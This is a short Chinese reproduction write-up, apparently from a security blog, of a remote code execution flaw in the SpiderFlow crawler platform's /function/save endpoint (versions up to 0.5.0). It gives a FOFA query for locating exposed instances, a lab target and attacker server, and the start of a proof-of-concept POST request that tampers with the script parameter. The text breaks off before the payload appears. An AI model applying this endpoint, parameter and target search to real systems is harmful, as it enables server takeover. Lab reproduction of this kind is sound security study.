0x01 前言
SpiderFlow是新一代开源爬虫平台,以图形化方式定义爬虫流程,不写代码即可完成爬虫。基于springboot+layui开发的前后端不分离,也可以进行二次开发。该系统/function/save接口存在RCE漏洞,攻击者可以构造恶意命令远控服务器。
影响范围:
- Up to (including) <= 0.5.0
漏洞搜索:
# fofa 语法
app="SpiderFlow"
复现准备:
- 靶机:春秋云境 http://xxxxx.cloudeci1.ichunqiu.com/
- 公网服务器:10.10.10.1
0x02 复现
1. 抓包
根据漏洞说明找到漏洞的具体位置,输入内容进行抓包
2. POC
修改 script 参数:
POST /function/save HTTP/1.1
Host: xxxxx.cloudeci1.ichunqiu.com:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko